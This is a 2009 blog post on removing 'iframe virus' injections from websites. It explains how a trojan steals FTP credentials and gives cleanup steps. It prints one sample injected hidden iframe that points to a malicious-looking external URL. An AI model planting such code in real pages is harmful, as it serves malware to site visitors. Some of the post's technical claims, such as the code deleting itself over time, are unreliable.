Friday, October 2, 2009

How to remove iframe virus

What is iframe : iframe is an inline frame which places another HTML document in a frame inside a normal HTML document, which was first introduced by Microsoft in the year 1997. The iframe tag is now widely supported by all visual browsers. Unlike an object element, an inline frame may be the "target" frame for links defined in other elements and it may be "selected" by a browser as the focus for printing, viewing HTML source etc.

The opening iframe tag must be closed by /iframe both with in tag < > syntax . Content between the iframe tags is used as alternative text to be displayed if the browser does not support iframes.The iframe element is invalid in Strict DTDs, and in XHTML version 1.1. Inline frames have, at times, been exploited to illicitly inject code into a website.

iframe injection is the virus which will be created in index.php, and other .html, .php , .asp etc files.

A sample iframe virus code might look like iframe src="http://superbetfair.cn/in.cgi?income43" width=1 height=1 style="visibility: hidden" /iframe.

First these iframe virus codes will be injected in index.php files. They will be placed at end of code. And minute by minute starts to delete the code. from rear end. So, your site will not be displayed, and you can see the message like ‘ unknown character found in …./index.php on line .... And it will avoid you to access the log in page also. The iframe virus uses very small frame to insert unexpected entry. If your site is infected by iframe virus you and anyone else won't be able to browse this specific pages and will get a warning message from google/Mozilla like this:


To remove iframe virus from your site follow these steps:
1. Backup everything including database and download these files as a .zip file to a clean computer.
2. Reinstall your Windows OS and remove the trojan from your computer using a antivirus.
3. Clean your code removing all iframes and jscript code that have been inserted by the trojan.
4. Check you databases and remove suspicious code from there too.
5. Change your FTP password and reinstall the FTPClient software.
6. Upload the cleaned version of your website and database.
7. Change the all infected / index files PERMISSIONS as 444, so that it can not be writtenable.

It is important to note that, the attack is caused by a trojan that resides in your computer ( either from removable devices like your music player or pendrive or from the infected websites you have visited ) and steal your ftp credential and adds codes to your website file. Since this trojan stoles all your FTP credentials ( and are used to access your site accounts and modify your code, inserting an iframe in some cases or in other cases, these kind of virus insert a compressed javascript code. So to be safe for the future you must change your FTP account password. Never use the FTP software for a long. Rather try to reinstall it time to time.

0 comments: